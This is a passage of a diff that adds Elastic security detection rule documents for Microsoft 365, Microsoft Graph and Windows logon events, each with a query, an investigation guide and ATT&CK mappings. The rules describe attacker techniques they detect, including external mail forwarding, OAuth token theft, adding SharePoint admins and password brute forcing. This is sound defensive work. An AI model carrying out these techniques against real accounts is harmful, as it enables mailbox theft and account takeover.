+- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes. +- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +web where + event.provider == "Exchange" and + event.action in ("New-InboxRule", "Set-InboxRule") and + event.outcome == "success" and + ( + (?o365.audit.Parameters.ForwardTo != null and not endsWith~(?o365.audit.Parameters.ForwardTo, user.domain)) or + (?o365.audit.Parameters.ForwardAsAttachmentTo != null and not endsWith~(?o365.audit.Parameters.ForwardAsAttachmentTo, user.domain)) or + (?o365.audit.Parameters.ForwardingAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingAddress, user.domain)) or + (?o365.audit.Parameters.ForwardingSmtpAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingSmtpAddress, user.domain)) or + (?o365.audit.Parameters.RedirectTo != null and not endsWith~(?o365.audit.Parameters.RedirectTo, user.domain)) or + (?o365.audit.Parameters.RedirectToRecipients != null and not endsWith~(?o365.audit.Parameters.RedirectToRecipients, user.domain)) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Email Forwarding Rule +** ID: T1114.003 +** Reference URL: https://attack.mitre.org/techniques/T1114/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc new file mode 100644 index 0000000000..9a3e0a36d8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added]] +=== M365 SharePoint Site Administrator Added + +Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-o365.audit-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/purview/audit-log-activities#site-permissions-activities +* https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/ + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Domain: Identity +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating M365 SharePoint Site Administrator Added* + + +Site Administrators in SharePoint Online have full control over a Site, including the ability to manage permissions, access all content, and configure site-level settings. Adversaries who gain access to a privileged account may assign Site Administrator rights to maintain persistent access or facilitate data exfiltration. The `SiteCollectionAdminAdded` audit event is logged when this privilege is granted. + + +*Possible Investigation Steps* + + +- Review the `user.id` field to determine who performed the action. Assess whether this user normally manages SharePoint site permissions. +- Examine the `o365.audit.ModifiedProperties.SiteAdmin.NewValue` field to identify the account that was granted Site Administrator privileges. +- Check the `o365.audit.SiteUrl` or `url.original` to determine which Site was targeted. Assess the sensitivity of the data stored in this site. +- Review the `o365.audit.TargetUserOrGroupName` and `o365.audit.TargetUserOrGroupType` fields for additional context on the target principal. +- Pivot to sign-in logs for the acting account to look for anomalies such as logins from unfamiliar locations, devices, or IP ranges. +- Investigate whether the newly added admin account has performed subsequent actions such as file downloads, permission changes, or sharing link creation. +- Check for other recent `SiteCollectionAdminAdded` events to determine if multiple Sites were targeted in a short time frame, which may indicate bulk privilege escalation. + + +*False Positive Analysis* + + +- Routine SharePoint administration tasks by IT teams may trigger this alert. Correlate with change management tickets or scheduled maintenance windows. +- Automated provisioning tools that assign Site admin roles during site creation or migration workflows may generate expected alerts. +- Organizational changes such as team transitions or restructuring may involve legitimate Site admin reassignments. + + +*Response and Remediation* + + +- If the admin addition is unauthorized, immediately remove the Site Administrator role from the suspicious account. +- Reset credentials for both the account that performed the action and the account that was added, especially if compromise is suspected. +- Review recent activity on the affected Site for signs of data exfiltration, permission changes, or content modifications. +- Enable or verify enforcement of MFA for all accounts with SharePoint administrative privileges. +- Audit the list of Site Administrators across all Sites to identify any other unauthorized additions. +- Consider implementing Privileged Access Management (PAM) or Privileged Identity Management (PIM) to require just-in-time elevation for SharePoint admin roles. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit + and event.provider:(SharePoint or OneDrive) + and event.category:web + and event.action:SiteCollectionAdminAdded + and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc new file mode 100644 index 0000000000..91117744a9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened]] +=== M365 SharePoint Site Sharing Policy Weakened + +Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed. This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-o365.audit-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/purview/audit-log-activities#site-administration-activities +* https://learn.microsoft.com/en-us/purview/audit-log-sharing +* https://learn.microsoft.com/en-us/sharepoint/turn-external-sharing-on-or-off + +*Tags*: + +* Domain: Cloud +* Domain: SaaS +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating M365 SharePoint Site Sharing Policy Weakened* + + +This rule detects when SharePoint or OneDrive sharing policies are modified to weaken security controls. The `SharingPolicyChanged` event captures modifications to site-level sharing settings stored in `ModifiedProperties`, where the setting name is a dynamic field key and `OldValue`/`NewValue` track the transition. This rule targets specific transitions that represent a security posture degradation. Note that Microsoft uses inconsistent keyword value formats across settings, some use `True`/`False` while others use `Enabled`/`Disabled`. + + +*Possible Investigation Steps* + + +- Identify the user who performed the change via `user.id` and determine if they have a legitimate administrative role. +- Check if the acting user is a service principal (e.g., `ServiceOperator`, `app@sharepoint`) or a human account. Service principal changes may indicate automated processes or compromised application credentials. +- Review which specific setting was changed by examining the `o365.audit.ModifiedProperties.*` fields: + - ShareWithGuests: Guest/external sharing was enabled on the site. External users can now be invited to access content. + - ShareUsingAnonymousLinks: Anonymous "Anyone" link sharing was enabled. Content can now be shared via unauthenticated links. + - IsPublic: The site or group was changed from private to public visibility. + - AllowGuestUser: Guest user access was enabled for the site. + - AllowFederatedUsers: Federated (external organization) user access was enabled. + - AllowTeamsConsumer: Teams personal account (consumer) user access was enabled. +- Identify the affected site via `o365.audit.ObjectId` (the site URL) and assess the sensitivity of its content. +- Review Azure AD / Entra ID sign-in logs for the acting account to check for authentication anomalies (unusual location, device code flow, new device). +- Look for subsequent sharing activity on the same site — `SharingSet`, `AnonymousLinkCreated`, `SharingInvitationCreated`, or file download events shortly after the policy change. +- Determine if the change was part of a planned change request or occurred outside of normal change windows. + + +*False Positive Analysis* + + +- IT administrators enabling external sharing for legitimate collaboration needs. Correlate with change management tickets or Slack/Teams messages. +- Automated provisioning scripts that configure sharing settings during site creation. These typically use service principal accounts with predictable patterns. +- Microsoft service operations (`ServiceOperator`) may modify settings as part of tenant-level policy propagation. + + +*Response and Remediation* + + +- If the change is unauthorized, immediately revert the sharing policy to its previous restrictive state. +- Revoke sessions and reset credentials for the compromised account. +- Review what content was accessed or shared after the policy change using `FileAccessed`, `FileDownloaded`, and sharing audit events. +- Audit all sites for similar unauthorized sharing policy changes. +- Implement Conditional Access policies to restrict administrative actions to trusted networks and compliant devices. +- Enable Privileged Identity Management (PIM) for SharePoint administrator roles to enforce just-in-time access. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and + event.action: "SharingPolicyChanged" and event.outcome: "success" and + ( + (o365.audit.ModifiedProperties.ShareWithGuests.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.ShareWithGuests.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.ShareUsingAnonymousLinks.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.IsPublic.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.IsPublic.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.AllowGuestUser.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.AllowGuestUser.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.AllowFederatedUsers.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.AllowFederatedUsers.OldValue: (false or "Disabled")) + or + (o365.audit.ModifiedProperties.AllowTeamsConsumer.NewValue: (true or "Enabled") and + o365.audit.ModifiedProperties.AllowTeamsConsumer.OldValue: (false or "Disabled")) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc new file mode 100644 index 0000000000..c3ca153d9f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc @@ -0,0 +1,134 @@ +[[prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client]] +=== Microsoft Graph Request Email Access by Unusual User and Client + +Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.graphactivitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://github.com/dirkjanm/ROADtools +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ +* https://pushsecurity.com/blog/consentfix + +*Tags*: + +* Domain: Cloud +* Domain: Email +* Data Source: Azure +* Data Source: Microsoft Graph +* Data Source: Microsoft Graph Activity Logs +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Graph Request Email Access by Unusual User and Client* + + +This rule detects instances where a previously unseen or rare Microsoft Graph application client ID accesses email-related APIs, such as `/me/messages`, `/sendMail`, or `/mailFolders/inbox/messages`. These accesses are performed via delegated user credentials using common OAuth scopes like `Mail.Read`, `Mail.ReadWrite`, `Mail.Send`, or `email`. This activity may indicate unauthorized use of a newly consented or compromised application to read or exfiltrate mail content. This is a New Terms rule that only signals if the application ID (`azure.graphactivitylogs.properties.app_id`) and user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) have not been seen doing this activity in the last 14 days. + + +*Possible Investigation Steps:* + + +- `azure.graphactivitylogs.properties.app_id`: Investigate the application ID involved. Is it known and sanctioned in your tenant? Pivot to Azure Portal → Enterprise Applications → Search by App ID to determine app details, publisher, and consent status. +- `azure.graphactivitylogs.properties.scopes`: Review the scopes requested by the application. Email-related scopes such as `Mail.ReadWrite` and `Mail.Send` are especially sensitive and suggest the app is interacting with mail content. +- `url.path` / `azure.graphactivitylogs.properties.requestUri`: Determine exactly which mail-related APIs were accessed (e.g., reading inbox, sending messages, enumerating folders). +- `user.id`: Identify the user whose credentials were used. Determine if the user recently consented to a new app, clicked a phishing link, or reported suspicious activity. +- `user_agent.original`: Check for suspicious automation tools (e.g., `python-requests`, `curl`, non-browser agents), which may suggest scripted access. +- `source.ip` and `client.geo`: Investigate the source IP and geography. Look for unusual access from unexpected countries, VPS providers, or anonymizing services. +- `http.request.method`: Determine intent based on HTTP method — `GET` (reading), `POST` (sending), `PATCH`/`DELETE` (modifying/removing messages). +- `token_issued_at` and `@timestamp`: Determine how long the token has been active and whether access is ongoing or recent. +- `azure.graphactivitylogs.properties.c_sid`: Use the session correlation ID to identify other related activity in the same session. This may help identify if the app is accessing multiple users' mailboxes or if the same user is accessing multiple apps. +- Correlate with Microsoft Entra ID (`azure.auditlogs` and `azure.signinlogs`) to determine whether: + - The app was recently granted admin or user consent + - Risky sign-ins occurred just prior to or after mail access + - The same IP or app ID appears across multiple users + + +*False Positive Analysis* + + +- New legitimate apps may appear after a user consents via OAuth. Developers, third-party tools, or IT-supplied utilities may access mail APIs if users consent. +- Users leveraging Microsoft development environments (e.g., Visual Studio Code) may trigger this behavior with delegated `.default` permissions. +- Admin-approved apps deployed via conditional access may trigger similar access logs if not previously seen in detection baselines. + + +*Response and Remediation* + + +- If access is unauthorized or unexpected: + - Revoke the app's consent in Azure AD via the Enterprise Applications blade. + - Revoke user refresh tokens via Microsoft Entra or PowerShell. + - Investigate the user's session and alert them to possible phishing or OAuth consent abuse. +- Review and restrict risky OAuth permissions in Conditional Access and App Governance policies. +- Add known, trusted app IDs to a detection allowlist to reduce noise in the future. +- Continue monitoring the app ID for additional usage across the tenant or from suspicious IPs. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.graphactivitylogs + and azure.graphactivitylogs.properties.app_id:* + and azure.graphactivitylogs.result_signature:200 + and azure.graphactivitylogs.properties.c_idtyp:user + and azure.graphactivitylogs.properties.client_auth_method:0 + and http.request.method:(DELETE or GET or PATCH or POST or PUT) + and ( + ( + url.path:(/v1.0/me/*cc or /v1.0/users/*) + and ( + url.path:((*inbox* or *mail* or *messages*) and not *mailboxSettings*) + or azure.graphactivitylogs.properties.requestUri:(*inbox* or *mail* or *messages*) + ) + ) + or azure.graphactivitylogs.properties.scopes:(Mail.Read or Mail.ReadWrite or Mail.Send) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc new file mode 100644 index 0000000000..bc6100a488 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc @@ -0,0 +1,145 @@ +[[prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client]] +=== Microsoft Graph Request User Impersonation by Unusual Client + +This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.graphactivitylogs-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://pushsecurity.com/blog/consentfix + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Graph +* Data Source: Microsoft Graph Activity Logs +* Resources: Investigation Guide +* Use Case: Identity and Access Audit +* Tactic: Initial Access + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Graph Request User Impersonation by Unusual Client* + + +This rule detects the first observed occurrence of a Microsoft Graph API request by a specific client application ID (`azure.graphactivitylogs.properties.app_id`) in combination with a user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) and tenant ID (`azure.tenant_id`) within specific number of days. This may indicate unauthorized access following a successful phishing attempt, token theft, or abuse of OAuth workflows. + +Adversaries frequently exploit legitimate Microsoft or third-party application IDs to avoid raising suspicion during initial access. By using pre-consented or trusted apps to interact with Microsoft Graph, attackers can perform actions on behalf of users without triggering conventional authentication alerts or requiring additional user interaction. + + +*Possible investigation steps* + + +- Review `azure.graphactivitylogs.properties.user_principal_object_id` and correlate with recent sign-in logs for the associated user. +- Determine whether `azure.graphactivitylogs.properties.app_id` is a known and approved application in your environment. +- Investigate the `user_agent.original` field for signs of scripted access (e.g., automation tools or libraries). +- Check the source IP address (`source.ip`) and geolocation data (`source.geo.*`) for unfamiliar origins. +- Inspect `azure.graphactivitylogs.properties.scopes` to understand the level of access being requested by the app. +- Examine any follow-up Graph API activity from the same `app_id` or `user_principal_object_id` for signs of data access or exfiltration. +- Correlate with device or session ID fields (`azure.graphactivitylogs.properties.c_sid`, if present) to detect persistent or repeat activity. + + +*False positive analysis* + + +- First-time use of a legitimate Microsoft or enterprise-approved application. +- Developer or automation workflows initiating new Graph API requests. +- Valid end-user activity following device reconfiguration or new client installation. +- Maintain an allowlist of expected `app_id` values and known developer tools. +- Suppress detections from known good `user_agent.original` strings or approved source IP ranges. +- Use device and identity telemetry to distinguish trusted vs. unknown activity sources. +- Combine with session risk or sign-in anomaly signals where available. + + +*Response and remediation* + + +- Reach out to the user and verify whether they authorized the application access. +- Revoke active OAuth tokens and reset credentials if unauthorized use is confirmed. +- Search for additional Graph API calls made by the same `app_id` or `user_principal_object_id`. +- Investigate whether sensitive resources (mail, files, Teams, contacts) were accessed. +- Apply Conditional Access policies to limit Graph API access by app type, IP, or device state. +- Restrict user consent for third-party apps and enforce admin approval workflows. +- Monitor usage of new or uncommon `app_id` values across your tenant. +- Provide user education on OAuth phishing tactics and reporting suspicious prompts. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.graphactivitylogs" + and event.type: "access" + and azure.graphactivitylogs.properties.app_id: * + and azure.graphactivitylogs.properties.c_idtyp: "user" + and azure.graphactivitylogs.properties.client_auth_method: 0 + and http.response.status_code: 200 + and url.domain: "graph.microsoft.com" + and not url.path: ( + /v1.0/organization + or /v1.0/me/licenseDetails + or /v1.0/me/photo* + or /v1.0/me/photos* + or /beta/me/settings/regionalAndLanguageSettings + or /v1.0/me/drive/special/copilotuploads + or /v1.0/me/informationProtection/sensitivityLabels + or /beta/me/informationProtection/dataLossPreventionPolicies + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc new file mode 100644 index 0000000000..3d7878513a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc @@ -0,0 +1,175 @@ +[[prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address]] +=== Multiple Logon Failure from the same Source Address + +Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625 +* https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624 +* https://social.technet.microsoft.com/Forums/ie/en-US/c82ac4f3-a235-472c-9fd3-53aa646cfcfd/network-information-missing-in-event-id-4624?forum=winserversecurity +* https://serverfault.com/questions/379092/remote-desktop-failed-logon-event-4625-not-logging-ip-address-on-2008-terminal-s/403638#403638 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide +* Data Source: Windows Security Event Logs + +*Version*: 118 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Logon Failure from the same Source Address* + + +Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found https://attack.mitre.org/techniques/T1110/001/[here]. + +This rule identifies potential password guessing/brute force activity from a single address. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the logon failure reason code and the targeted user names. + - Prioritize the investigation if the account is critical or has administrative privileges over the domain. +- Investigate the source IP address of the failed Network Logon attempts. + - Identify whether these attempts are coming from the internet or are internal. +- Investigate other alerts associated with the involved users and source host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. +- Check whether the involved credentials are used in automation or scheduled tasks. +- If this activity is suspicious, contact the account owner and confirm whether they are aware of it. +- Examine the source host for derived artifacts that indicate compromise: + - Observe and collect information about the following activities in the alert source host: + - Attempts to contact external domains and addresses. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity + + +*False positive analysis* + + +- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state. +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Domain trust relationship issues. +- Infrastructure or availability issues. + + +*Related rules* + + +- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the source host to prevent further post-compromise behavior. +- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +- In some cases the source network address in Windows events 4625/4624 is not populated due to Microsoft logging limitations (examples in the references links). This edge case will break the rule condition and it won't trigger an alert. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where event.category == "authentication" and host.os.type == "windows" and event.action == "logon-failed" and + winlog.logon.type == "Network" and source.ip is not null and winlog.computer_name is not null and + not cidr_match(TO_IP(source.ip), "127.0.0.0/8", "::1") and + not user.name in ("ANONYMOUS LOGON", "-") and not user.name like "*$" and user.domain != "NT AUTHORITY" and + /* + noisy failure status codes often associated to authentication misconfiguration + 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine. + 0XC000005E - There are currently no logon servers available to service the logon request. + 0XC0000133 - Clocks between DC and other computer too far out of sync. + 0XC0000192 An attempt was made to logon, but the Netlogon service was not started. + 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication. + */ + not winlog.event_data.Status in ("0xc000015b", "0xc000005e", "0xc0000133", "0xc0000192", "0xc00000dc") +// truncate the timestamp to a 60-second window +| eval Esql.time_window = date_trunc(60 seconds, @timestamp) +| stats Esql.failed_auth_count = COUNT(*), + Esql.count_distinct_target_user_name = count_distinct(winlog.event_data.TargetUserName), + Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName), + Esql.user_domain_values = VALUES(user.domain), + Esql.error_codes = VALUES(winlog.event_data.Status), + Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type +| where Esql.failed_auth_count >= 100 and Esql.count_distinct_target_user_name >= 2 +| eval user.name = MV_FIRST(Esql.target_user_name_values) +| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** 